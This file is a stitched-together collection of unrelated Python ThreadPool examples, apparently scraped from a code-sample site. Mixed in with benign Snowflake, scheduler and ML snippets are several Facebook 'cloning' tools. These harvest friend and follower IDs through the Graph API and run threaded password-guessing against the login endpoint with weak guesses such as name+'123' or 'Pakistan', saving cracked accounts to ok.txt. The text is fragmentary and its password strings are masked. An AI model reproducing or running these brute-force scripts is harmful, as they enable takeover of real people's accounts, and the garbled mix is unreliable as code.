                                data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass='******'loc' in q:
                                    print '\x1b[1;32m[Successful] \x1b[1;30m' + uid + ' | ' + pass6 + '\x1b[0;97m'
                                    ok = open('ok.txt', 'a')
                                    ok.write(uid + ' | ' + pass6 + '\n')
                                    ok.close()
                                    oks.append(uid + pass6)
                                elif 'www.facebook.com' in q['error']:
                                    print '[Checkpoint] ' + uid + ' | ' + pass6
                                    cp = open('cp.txt', 'a')
                                    cp.write(uid + ' | ' + pass6 + '\n')
                                    cp.close()
                                    cps.append(uid + pass6)
                                else:
                                    pass7 = 'Pakistan'
                                    data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass='******'loc' in q:
                                        print '\x1b[1;32m[Successful] \x1b[1;30m' + uid + ' | ' + pass7 + '\x1b[0;97m'
                                        ok = open('ok.txt', 'a')
                                        ok.write(uid + ' | ' + pass7 + '\n')
                                        ok.close()
                                        oks.append(uid + pass7)
                                    elif 'www.facebook.com' in q['error']:
                                        print '[Checkpoint] ' + uid + ' | ' + pass7
                                        cp = open('cp.txt', 'a')
                                        cp.write(uid + ' | ' + pass7 + '\n')
                                        cp.close()
                                        cps.append(uid + pass7)
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print ''
    print 47 * '-'
    print ''
    print ' The process has completed'
    print ' Total Ok/Cp :' + str(len(oks)) + '/' + str(len(cps))
    print ''
    print 47 * '-'
    print ''
    raw_input(' Press entet to back ')
    l_menu()
class SnowflakeChunkDownloader(object):
    u"""
    Large Result set chunk downloader class.
    """
    def _pre_init(self,
                  chunks,
                  connection,
                  cursor,
                  qrmk,
                  chunk_headers,
                  query_result_format='JSON',
                  prefetch_threads=DEFAULT_CLIENT_PREFETCH_THREADS,
                  use_ijson=False):
        self._use_ijson = use_ijson
        self._query_result_format = query_result_format

        self._downloader_error = None

        self._connection = connection
        self._cursor = cursor
        self._qrmk = qrmk
        self._chunk_headers = chunk_headers

        self._chunk_size = len(chunks)
        self._chunks = {}
        self._chunk_cond = Condition()

        self._effective_threads = min(prefetch_threads, self._chunk_size)
        if self._effective_threads < 1:
            self._effective_threads = 1

        for idx, chunk in enumerate(chunks):
            logger.debug(u"queued chunk %d: rowCount=%s", idx,
                         chunk[u'rowCount'])
            self._chunks[idx] = SnowflakeChunk(url=chunk[u'url'],
                                               result_data=None,
                                               ready=False,
                                               row_count=int(
                                                   chunk[u'rowCount']))

        logger.debug(
            u'prefetch threads: %s, '
            u'number of chunks: %s, '
            u'effective threads: %s', prefetch_threads, self._chunk_size,
            self._effective_threads)

        self._pool = ThreadPool(self._effective_threads)

        self._downloading_chunks_lock = Lock()
        self._total_millis_downloading_chunks = 0
        self._total_millis_parsing_chunks = 0

        self._next_chunk_to_consume = 0

    def __init__(self,
                 chunks,
                 connection,
                 cursor,
                 qrmk,
                 chunk_headers,
                 query_result_format='JSON',
                 prefetch_threads=DEFAULT_CLIENT_PREFETCH_THREADS,
                 use_ijson=False):
        self._pre_init(chunks,
                       connection,
                       cursor,
                       qrmk,
                       chunk_headers,
                       query_result_format=query_result_format,
                       prefetch_threads=prefetch_threads,
                       use_ijson=use_ijson)
        logger.debug('Chunk Downloader in memory')
        for idx in range(self._effective_threads):
            self._pool.apply_async(self._download_chunk, [idx])
        self._next_chunk_to_download = self._effective_threads

    def _download_chunk(self, idx):
        """
        Downloads a chunk asynchronously
        """
        logger.debug(u'downloading chunk %s/%s', idx + 1, self._chunk_size)
        headers = {}
        try:
            if self._chunk_headers is not None:
                headers = self._chunk_headers
                logger.debug(u'use chunk headers from result')
            elif self._qrmk is not None:
                headers[SSE_C_ALGORITHM] = SSE_C_AES
                headers[SSE_C_KEY] = self._qrmk

            logger.debug(u"started getting the result set %s: %s", idx + 1,
                         self._chunks[idx].url)
            result_data = self._fetch_chunk(self._chunks[idx].url, headers)
            logger.debug(u"finished getting the result set %s: %s", idx + 1,
                         self._chunks[idx].url)

            if isinstance(result_data, ResultIterWithTimings):
                metrics = result_data.get_timings()
                with self._downloading_chunks_lock:
                    self._total_millis_downloading_chunks += metrics[
                        ResultIterWithTimings.DOWNLOAD]
                    self._total_millis_parsing_chunks += metrics[
                        ResultIterWithTimings.PARSE]

            with self._chunk_cond:
                self._chunks[idx] = self._chunks[idx]._replace(
                    result_data=result_data, ready=True)
                self._chunk_cond.notify_all()
                logger.debug(u'added chunk %s/%s to a chunk list.', idx + 1,
                             self._chunk_size)
        except Exception as e:
            logger.exception(
                u'Failed to fetch the large result set chunk %s/%s', idx + 1,
                self._chunk_size)
            self._downloader_error = e

    def next_chunk(self):
        """
        Gets the next chunk if ready
        """
        logger.debug(
            u'next_chunk_to_consume={next_chunk_to_consume}, '
            u'next_chunk_to_download={next_chunk_to_download}, '
            u'total_chunks={total_chunks}'.format(
                next_chunk_to_consume=self._next_chunk_to_consume + 1,
                next_chunk_to_download=self._next_chunk_to_download + 1,
                total_chunks=self._chunk_size))
        if self._next_chunk_to_consume > 0:
            # clean up the previously fetched data
            n = self._next_chunk_to_consume - 1
            self._chunks[n] = self._chunks[n]._replace(result_data=None,
                                                       ready=False)

            if self._next_chunk_to_download < self._chunk_size:
                self._pool.apply_async(self._download_chunk,
                                       [self._next_chunk_to_download])
                self._next_chunk_to_download += 1

        if self._downloader_error is not None:
            raise self._downloader_error

        for attempt in range(MAX_RETRY_DOWNLOAD):
            logger.debug(
                u'waiting for chunk %s/%s'
                u' in %s/%s download attempt', self._next_chunk_to_consume + 1,
                self._chunk_size, attempt + 1, MAX_RETRY_DOWNLOAD)
            done = False
            for wait_counter in range(MAX_WAIT):
                with self._chunk_cond:
                    if self._downloader_error:
                        raise self._downloader_error
                    if self._chunks[self._next_chunk_to_consume].ready:
                        done = True
                        break
                    logger.debug(
                        u'chunk %s/%s is NOT ready to consume'
                        u' in %s/%s(s)', self._next_chunk_to_consume + 1,
                        self._chunk_size,
                        (wait_counter + 1) * WAIT_TIME_IN_SECONDS,
                        MAX_WAIT * WAIT_TIME_IN_SECONDS)
                    self._chunk_cond.wait(WAIT_TIME_IN_SECONDS)
            else:
                logger.debug(
                    u'chunk %s/%s is still NOT ready. Restarting chunk '
                    u'downloader threads', self._next_chunk_to_consume + 1,
                    self._chunk_size)
                self._pool.terminate()  # terminate the thread pool
                self._pool = ThreadPool(self._effective_threads)
                for idx0 in range(self._effective_threads):
                    idx = idx0 + self._next_chunk_to_consume
                    self._pool.apply_async(self._download_chunk, [idx])
            if done:
                break
        else:
            Error.errorhandler_wrapper(
                self._connection, self._cursor, OperationalError, {
                    u'msg': u'The result set chunk download fails or hang for '
                    u'unknown reason.',
                    u'errno': ER_CHUNK_DOWNLOAD_FAILED
                })
        logger.debug(u'chunk %s/%s is ready to consume',
                     self._next_chunk_to_consume + 1, self._chunk_size)

        ret = self._chunks[self._next_chunk_to_consume]
        self._next_chunk_to_consume += 1
        return ret

    def terminate(self):
        """
        Terminates downloading the chunks.
        """
        if hasattr(self, u'_pool') and self._pool is not None:
            self._pool.close()
            self._pool.join()
            self._pool = None

    def __del__(self):
        try:
            self.terminate()
        except:
            # ignore all errors in the destructor
            pass

    def _fetch_chunk(self, url, headers):
        """
        Fetch the chunk from S3.
        """
        handler = JsonBinaryHandler(is_raw_binary_iterator=True,
                                    use_ijson=self._use_ijson) \
            if self._query_result_format == 'json' else \
            ArrowBinaryHandler(self._cursor, self._connection)

        return self._connection.rest.fetch(u'get',
                                           url,
                                           headers,
                                           timeout=DEFAULT_REQUEST_TIMEOUT,
                                           is_raw_binary=True,
                                           binary_data_handler=handler)
Exemple #33
0
def pb():
	bp=raw_input(W + ' ✬🄵🄰🄲🄴🄱🄾🄾🄺✬   ')
	if bp =='':
		print (R + 'Select a valid option !')
		pb()
	elif bp =='1':
		cb()
		print (logo)
		r=requests.get('https://graph.facebook.com/me/friends?access_token='+tb)
		z=json.loads(r.text)
		for s in z['data']:
			id.append(s['id'])
	elif bp=='2':
		cb()
		print (logo)
		idt=raw_input(S + '[☆] ' + G + 'Put Public User ID/User Name: ' + W + '')
		cb()
		print (logo)
		try:
			jok=requests.get('https://graph.facebook.com/'+idt+'?access_token='+tb)
			op=json.loads(jok.text)
			psb(S + '[☆]' + G + ' Account  Name: ' + W + op['name'])
		except KeyError:
			print (R + ' ID not found !')
			raw_input(R + ' Back')
			pak()
		r=requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+tb)
		z=json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif bp =='3':
		cb()
		print (logo)
		try:
			idlist=raw_input(S + '[☆] ' + R + 'Enter File Path: ' + G + '')
			for line in open(idlist,'r').readlines():
				id.append(line.strip())
		except IOError:
			print (R + ' File Not Fount !')
			raw_input(R + ' Back')
			pak()
	elif bp =='0':
		menu()
	else:
		print (R + ' Select a valid option !')
		pb()
	print (S + '[☆]' + P + ' Total Friends: ' + W + str(len(id)))
	psb(S + '[☆]' + S + ' To stop process  click on CTRL ~ Z')
	print
	print (S + 50*'-')
	print
	def main(arg):
		global cps, oks
		user=arg
		try:
			h=requests.get('https://graph.facebook.com/'+user+'/?access_token='+tb)
			j=json.loads(h.text)
			ps1=('786786')
			dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='******'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			k=json.load(dt)
			if 'www.facebook.com' in k['error_msg']:
			    print(S+'[CP] ♡ '+user+' ♡ '+ps1)
			    cps.append(user+ps1)
			else:
			    if 'access_token' in k:
			        print (G+'[OK] ♡ '+user+' ♡ '+ps1)
			        oks.append(user+ps1)
			    else:
			        ps2=(j['first_name']+'123')
			        dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='******'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			        k=json.load(dt)
			        if 'www.facebook.com' in k['error_msg']:
			            print(S+'[CP] ♡ '+user+' ♡ '+ps2)
			            cps.append(user+ps2)
			        else:
			            if 'access_token' in k:
			                print(G+'[OK] ♡ '+user+' ♡ '+ps2)
			                oks.append(user+ps2)
			            else:
			                ps3=(j['first_name']+'786')
			                dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='******'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			                k=json.load(dt)
			                if 'www.facebook.com' in k['error_msg']:
			                    print(S+'[CP] ♡ '+user+' ♡ '+ps3)
			                    cps.append(user+ps3)
			                else:
			                    if 'access_token' in k:
			                        print(G+'[OK] ♡ '+user+' ♡ '+ps3)
			                        oks.append(user+ps3)
			                    else:
			                        ps4=(j['first_name']+'12345')
			                        dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='******'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			                        k=json.load(dt)
			                        if 'www.facebook.com' in k['error_msg']:
			                            print(S+'[CP] ♡ '+user+' ♡ '+ps4)
			                            cps.append(user+ps4)
			                        else:
			                            if 'access_token' in k:
			                                print(G+'[OK] ♡ '+user+' ♡ '+ps4)
			                                oks.append(user+ps4)
			                            else:
			                                ps5=('Pakistan')
			                                dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='******'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			                                k=json.load(dt)
			                                if 'www.facebook.com' in k['error_msg']:
			                                    print(S+'[CP] ♡ '+user+' ♡ '+ps5)
			                                    cps.append(user+ps5)
			                                else:
			                                    if 'access_token' in k:
			                                        print(G+'[OK] ♡ '+user+' ♡ '+ps5)
			                                        oks.append(user+ps5)
			                                    else:
			                                        ps6=(j['first_name']+'khan')
			                                        dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='******'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			                                        k=json.load(dt)
			                                        if 'www.facebook.com' in k['error_msg']:
			                                            print(S+'[CP] ♡ '+user+' ♡ '+ps6)
			                                            cps.append(user+ps6)
			                                        else:
			                                            if 'access_token' in k:
			                                                print(G+'[OK] ♡ '+user+' ♡ '+ps6)
			                                                oks.append(user+ps6)
		except:
			pass
	p=ThreadPool(30)
	p.map(main, id)
	print
	print(S+50*'-')
	print
	print(S+'Process has been completed CP ID Open After 7 Days ')
	print(Y+'Total '+G+'OK'+S+'/'+P+'CP'+S+' = '+G+str(len(oks))+S+'/'+R+str(len(cps)))
	print(S+'BlackMafia')     
	print
	raw_input(R + 'Back')
	os.system('python2 AH.py')
Exemple #34
0
 def multi_thread_parse(callback, urls):
     pool = ThreadPool(THREAD_POOL_SIZE)
     results = pool.map(callback, urls)
     return results
Exemple #35
0
class Distributer(object):
    def __init__(self, kind, chunkSize=20):
        self.kind = kind
        self.chunk_size = chunkSize

    def distribute(self, function, function_kwargs, iterable, starmap=False, skip_if_error=True, max_attempts=3):
        if self.kind == 'thread':
            self.pool = ThreadPool(self.chunk_size)
        else:
            raise NotImplemented

        if isinstance(self.pool, ThreadPool):
            for chunk in chunks(iterable, self.chunk_size):
                attempts = 0
                individually = False

                while attempts < max_attempts:
                    try:
                        if not individually:
                            if starmap:
                                ret = self.pool.starmap(function, chunk)
                            else:
                                ret = self.pool.map(partial(function, **function_kwargs), chunk)
                            attempts = max_attempts
                        else:
                            ret = []
                            for item in chunk:
                                try:
                                    if starmap:
                                        val = function(*item)
                                    else:
                                        val = partial(function, **function_kwargs)(item)
                                    ret.append(val)

                                except Exception as e:
                                    log.critical(e)
                                    log.critical(''.join(traceback.format_exception(None, e, e.__traceback__)))
                                    attempts += 1
                                    if attempts >= max_attempts:
                                        if skip_if_error:
                                            ret.append(pd.DataFrame())
                                        else:
                                            raise e

                    except Exception as e:
                        log.error(e)
                        attempts += 1
                        if attempts >= max_attempts:
                            individually = True
                            attempts = 0

                for i, item in enumerate(ret):
                    yield (chunk[i], item)

        else:
            raise NotImplemented

        self.pool.stop()

    def stop(self):
        self.pool.stop()

    @staticmethod
    def default():
        return Distributer('thread')
Exemple #36
0
    utils = Utilities(nParticles)
    #history = Histories()
    #history.set_up_config(config=config)
    #history.on_train_begin()
    # Build the first training dataset
    print("TRAIN_DATA: ", TRAIN_DATA)
    X_train, Y, W_train, MVA_train = utils.BuildBatch(indir=TRAIN_DATA,
                                                      nEvents=50,
                                                      nFiles=10)

    model = loader.load_multiclass(
        ouput_class=4,
        loss='categorical_crossentropy')  #,weights=class_weight)

    for epoch in range(1000):
        pool_local = ThreadPool(processes=1)
        # Shuffle loaded datasets and begin
        inds = range(len(X_train))
        np.random.shuffle(inds)
        X_epoch, Y_epoch, W_epoch, MVA_epoch = X_train[inds], Y[inds], W_train[
            inds], MVA_train[inds]
        # Check that nothing strange happened in the loaded datset
        if (np.min(W_train) == np.nan): continue
        if (np.min(W_train) == np.inf): continue
        cwd = {0: 1, 1: 1, 2: 1, 3: 1}  #dict()
        ##Save the validation:
        ## Get class weights:
        Y = MVA_epoch[:, 2:]
        y = np.argmax(Y, axis=1)
        _class_weight = class_weight.compute_class_weight(
            "balanced", [0, 1, 2, 3], y)
Exemple #37
0
def b_menu_select():
    select = raw_input('\t  \x1b[1;35mChoose Option >>>  \x1b[0;97m')
    id = []
    oks = []
    cps = []
    if select == '1':
        os.system('clear')
        logo()
        print ''
        os.system('echo -e "\t    Public ID Cloning " | lolcat')
        print ''
        idt = raw_input(' Put Id/user :  '******'clear')
        logo()
        print ''
        os.system('echo -e "\t    Gathering Information " | lolcat')
        print ''
        try:
            r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token)
            q = json.loads(r.text)
            os.system('clear')
            logo()
            print ''
            os.system('echo -e "\t    Public ID Cloning " | lolcat')
            print ''
            print ' Target user : '******'name']
        except (KeyError, IOError):
            print ''
            print '\n\t    \x1b[1;31m Logged in id has checkpoint\x1b[0;97m'
            print ''
            raw_input('\nPress enter to back ')
            b_menu()

        r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif select == '2':
        os.system('clear')
        logo()
        print ''
        os.system('echo -e "\t    Followers Cloning " | lolcat')
        print ''
        idt = raw_input(' Put Id/user : '******'clear')
        logo()
        print ''
        os.system('echo -e "\t    Gathering Information " | lolcat')
        print ''
        try:
            r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token, headers=header)
            q = json.loads(r.text)
            os.system('clear')
            logo()
            print ''
            os.system('echo -e "\t    Followers Cloning" | lolcat')
            print ''
            print ' Target user : '******'name']
        except (KeyError, IOError):
            print ''
            print '\n\t    \x1b[1;31m Logged in id has checkpoint\x1b[0;97m'
            print ''
            raw_input('\nPress enter to back ')
            b_menu()

        r = requests.get('https://graph.facebook.com/' + idt + '/subscribers?access_token=' + token + '&limit=5000', headers=header)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif select == '3':
        view_token()
    elif select == '4':
        extract_dob()
    elif select == '5':
        method_menu()
    elif select == '6':
        logout()
    else:
        print ''
        print '\t    ' + c + 'Select valid method' + c2
        print ''
        b_menu_select()
    print ' Total IDs : ' + str(len(id))
    time.sleep(0.5)
    print ' The process is running in background'
    print ''
    print 47 * '-'
    print ''

    def main(arg):
        user = arg
        uid, name = user.split('|')
        try:
            pass1 = name + '123'
            q = requests.get('https://mbasic.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + uid + '&locale=vi_vn&password='******'&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c', headers=header).text
            d = json.loads(q)
            if 'www.facebook.com' in d['error_msg']:
                print '[Checkpoint] ' + uid + ' | ' + pass1
                cp = open('cp.txt', 'a')
                cp.write(uid + ' | ' + pass1 + '\n')
                cp.close()
                cps.append(uid)
            elif 'access_token' in d:
                print '\x1b[1;92m[Successfull] \x1b[1;30m' + uid + ' | ' + pass1 + '\x1b[1;0m'
                ok = open('ok.txt', 'a')
                ok.write(uid + ' | ' + pass1 + '\n')
                ok.close()
                oks.append(uid)
            else:
                pass2 = name + '1234'
                q = requests.get('https://mbasic.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + uid + '&locale=vi_vn&password='******'&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c', headers=header).text
                d = json.loads(q)
                if 'www.facebook.com' in d['error_msg']:
                    print '[Checkpoint] ' + uid + ' | ' + pass2
                    cp = open('cp.txt', 'a')
                    cp.write(uid + ' | ' + pass2 + '\n')
                    cp.close()
                    cps.append(uid)
                elif 'access_token' in d:
                    print '\x1b[1;92m[Successfull] \x1b[1;30m' + uid + ' | ' + pass2 + '\x1b[1;0m'
                    ok = open('ok.txt', 'a')
                    ok.write(uid + ' | ' + pass2 + '\n')
                    ok.close()
                    oks.append(uid)
                else:
                    pass3 = name + '12345'
                    q = requests.get('https://mbasic.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + uid + '&locale=vi_vn&password='******'&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c', headers=header).text
                    d = json.loads(q)
                    if 'www.facebook.com' in d['error_msg']:
                        print '[Checkpoint] ' + uid + ' | ' + pass3
                        cp = open('cp.txt', 'a')
                        cp.write(uid + ' | ' + pass3 + '\n')
                        cp.close()
                        cps.append(uid)
                    elif 'access_token' in d:
                        print ' \x1b[1;92m[Successfull] \x1b[1;30m' + uid + ' | ' + pass3 + '\x1b[1;0m'
                        ok = open('ok.txt', 'a')
                        ok.write(uid + ' | ' + pass3 + '\n')
                        ok.close()
                        oks.append(uid)
                    else:
                        pass4 = name + '786'
                        q = requests.get('https://mbasic.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + uid + '&locale=vi_vn&password='******'&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c', headers=header).text
                        d = json.loads(q)
                        if 'www.facebook.com' in d['error_msg']:
                            print '[Checkpoint] ' + uid + ' | ' + pass4
                            cp = open('cp.txt', 'a')
                            cp.write(uid + ' | ' + pass4 + '\n')
                            cp.close()
                            cps.append(uid)
                        elif 'access_token' in d:
                            print '\x1b[1;92m[Successfull] \x1b[1;30m' + uid + ' | ' + pass4 + '\x1b[1;0m'
                            ok = open('ok.txt', 'a')
                            ok.write(uid + ' | ' + pass4 + '\n')
                            ok.close()
                            oks.append(uid)
                        else:
                            pass5 = '786786'
                            q = requests.get('https://mbasic.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + uid + '&locale=vi_vn&password='******'&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c', headers=header).text
                            d = json.loads(q)
                            if 'www.facebook.com' in d['error_msg']:
                                print '[Checkpoint] ' + uid + ' | ' + pass5
                                cp = open('cp.txt', 'a')
                                cp.write(uid + ' | ' + pass5 + '\n')
                                cp.close()
                                cps.append(uid)
                            elif 'access_token' in d:
                                print '\x1b[1;92m[Successfull] \x1b[1;30m' + uid + ' | ' + pass5 + '\x1b[1;0m'
                                ok = open('ok.txt', 'a')
                                ok.write(uid + ' | ' + pass5 + '\n')
                                ok.close()
                                oks.append(uid)
                            else:
                                pass6 = '000786'
                                q = requests.get('https://mbasic.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + uid + '&locale=vi_vn&password='******'&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c', headers=header).text
                                d = json.loads(q)
                                if 'www.facebook.com' in d['error_msg']:
                                    print '[Checkpoint] ' + uid + ' | ' + pass6
                                    cp = open('cp.txt', 'a')
                                    cp.write(uid + ' | ' + pass6 + '\n')
                                    cp.close()
                                    cps.append(uid)
                                elif 'access_token' in d:
                                    print '\x1b[1;92m[Successfull] \x1b[1;30m' + uid + ' | ' + pass6 + '\x1b[1;0m'
                                    ok = open('ok.txt', 'a')
                                    ok.write(uid + ' | ' + pass6 + '\n')
                                    ok.close()
                                    oks.append(uid)
                                else:
                                    pass7 = 'pakistan'
                                    q = requests.get('https://mbasic.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + uid + '&locale=vi_vn&password='******'&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c', headers=header).text
                                    d = json.loads(q)
                                    if 'www.facebook.com' in d['error_msg']:
                                        print '[Checkpoint] ' + uid + ' | ' + pass7
                                        cp = open('cp.txt', 'a')
                                        cp.write(uid + ' | ' + pass7 + '\n')
                                        cp.close()
                                        cps.append(uid)
                                    elif 'access_token' in d:
                                        print '\x1b[1;92m[Successfull] \x1b[1;30m' + uid + ' | ' + pass7 + '\x1b[1;0m'
                                        ok = open('ok.txt', 'a')
                                        ok.write(uid + ' | ' + pass7 + '\n')
                                        ok.close()
                                        oks.append(uid)
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print ' '
    print 47 * '-'
    print ''
    print ' Process has completed'
    print ' Total Cp/Ok : ' + str(len(cps)) + '/' + str(len(oks))
    print ''
    print 47 * '-'
    print ''
    raw_input(' Press enter to back ')
    b_menu()
    def next_chunk(self):
        """
        Gets the next chunk if ready
        """
        logger.debug(
            u'next_chunk_to_consume={next_chunk_to_consume}, '
            u'next_chunk_to_download={next_chunk_to_download}, '
            u'total_chunks={total_chunks}'.format(
                next_chunk_to_consume=self._next_chunk_to_consume + 1,
                next_chunk_to_download=self._next_chunk_to_download + 1,
                total_chunks=self._chunk_size))
        if self._next_chunk_to_consume > 0:
            # clean up the previously fetched data
            n = self._next_chunk_to_consume - 1
            self._chunks[n] = self._chunks[n]._replace(result_data=None,
                                                       ready=False)

            if self._next_chunk_to_download < self._chunk_size:
                self._pool.apply_async(self._download_chunk,
                                       [self._next_chunk_to_download])
                self._next_chunk_to_download += 1

        if self._downloader_error is not None:
            raise self._downloader_error

        for attempt in range(MAX_RETRY_DOWNLOAD):
            logger.debug(
                u'waiting for chunk %s/%s'
                u' in %s/%s download attempt', self._next_chunk_to_consume + 1,
                self._chunk_size, attempt + 1, MAX_RETRY_DOWNLOAD)
            done = False
            for wait_counter in range(MAX_WAIT):
                with self._chunk_cond:
                    if self._downloader_error:
                        raise self._downloader_error
                    if self._chunks[self._next_chunk_to_consume].ready:
                        done = True
                        break
                    logger.debug(
                        u'chunk %s/%s is NOT ready to consume'
                        u' in %s/%s(s)', self._next_chunk_to_consume + 1,
                        self._chunk_size,
                        (wait_counter + 1) * WAIT_TIME_IN_SECONDS,
                        MAX_WAIT * WAIT_TIME_IN_SECONDS)
                    self._chunk_cond.wait(WAIT_TIME_IN_SECONDS)
            else:
                logger.debug(
                    u'chunk %s/%s is still NOT ready. Restarting chunk '
                    u'downloader threads', self._next_chunk_to_consume + 1,
                    self._chunk_size)
                self._pool.terminate()  # terminate the thread pool
                self._pool = ThreadPool(self._effective_threads)
                for idx0 in range(self._effective_threads):
                    idx = idx0 + self._next_chunk_to_consume
                    self._pool.apply_async(self._download_chunk, [idx])
            if done:
                break
        else:
            Error.errorhandler_wrapper(
                self._connection, self._cursor, OperationalError, {
                    u'msg': u'The result set chunk download fails or hang for '
                    u'unknown reason.',
                    u'errno': ER_CHUNK_DOWNLOAD_FAILED
                })
        logger.debug(u'chunk %s/%s is ready to consume',
                     self._next_chunk_to_consume + 1, self._chunk_size)

        ret = self._chunks[self._next_chunk_to_consume]
        self._next_chunk_to_consume += 1
        return ret
Exemple #39
0
    def __init__(self, harness, params):
        MooseObject.__init__(self, harness, params)

        ## The test harness to run callbacks on
        self.harness = harness

        # Retrieve and store the TestHarness options for use in this object
        self.options = harness.getOptions()

        # The Scheduler class can be initialized with no "max_processes" argument and it'll default
        # to a soft limit. If however a max_processes is passed we'll treat it as a hard limit.
        # The difference is whether or not we allow single jobs to exceed the number of slots.
        if params['max_processes'] == None:
            self.available_slots = 1
            self.soft_limit = True
        else:
            self.available_slots = params['max_processes'] # hard limit
            self.soft_limit = False

        self.average_load = params['average_load']

        self.min_report_time = params['min_reported_time']

        # Initialize run_pool based on available slots
        self.run_pool = ThreadPool(processes=self.available_slots)

        # Initialize status_pool to only use 1 process (to prevent status messages from getting clobbered)
        self.status_pool = ThreadPool(processes=1)

        # Slot lock when processing resource allocations and modifying slots_in_use
        self.slot_lock = threading.Lock()

        # Job lock when modifying a jobs status
        self.activity_lock = threading.Lock()

        # Job count lock when modifying incoming/outgoing jobs
        self.job_count_lock = threading.Lock()

        # A combination of processors + threads (-j/-n) currently in use, that a job requires
        self.slots_in_use = 0

        # Count of jobs which need to complete
        self.job_count = 0

        # Set containing all submitted jobs
        self.__job_bank = set([])

        # Total running Job and Test failures encountered
        self.__failures = 0

        # Allow threads to set a global exception
        self.__error_state = False

        # Private set of jobs currently running
        self.__active_jobs = set([])

        # Jobs that are taking longer to finish than the alloted time are reported back early to inform
        # the user 'stuff' is still running. Jobs entering this set will not be reported again.
        self.jobs_reported = set([])

        # The last time the scheduler reported something
        self.last_reported_time = clock()

        # Sets of threading objects created by jobs entering and exiting the queues. When scheduler.waitFinish()
        # is called, and both thread pools are empty, the pools shut down, and the call to waitFinish() returns.
        self.__status_pool_lock = threading.Lock()
        self.__runner_pool_lock = threading.Lock()
        self.__status_pool_jobs = set([])
        self.__runner_pool_jobs = set([])

        # True when scheduler.waitFinish() is called. This alerts the scheduler, no more jobs are
        # to be scheduled. KeyboardInterrupts are then handled by the thread pools.
        self.__waiting = False
Exemple #40
0
def dob_select():
    select = raw_input('\n Choose Option >>> ')
    id = []
    nms = []
    if select == '1':
        os.system('clear')
        logo()
        print ''
        print '\t    \x1b[1;32mGrab DOB From Friendlist\x1b[0;97m'
        print ''
        idt = raw_input(' Put Id/user : '******'https://graph.facebook.com/' + idt + '?access_token=' + token, headers=header)
            q = json.loads(r.text)
            print ' Target Id : ' + q['name']
        except KeyError:
            print ''
            print '\x1b[1;31mID Not Found' + c2
            print ''
            raw_input('\nPress enter to back ')
            dob_select()

        r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token, headers=header)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif select == '2':
        os.system('clear')
        logo()
        print ''
        print '\x1b[1;32m Grab DOB From Followers\x1b[0;97m'
        print ''
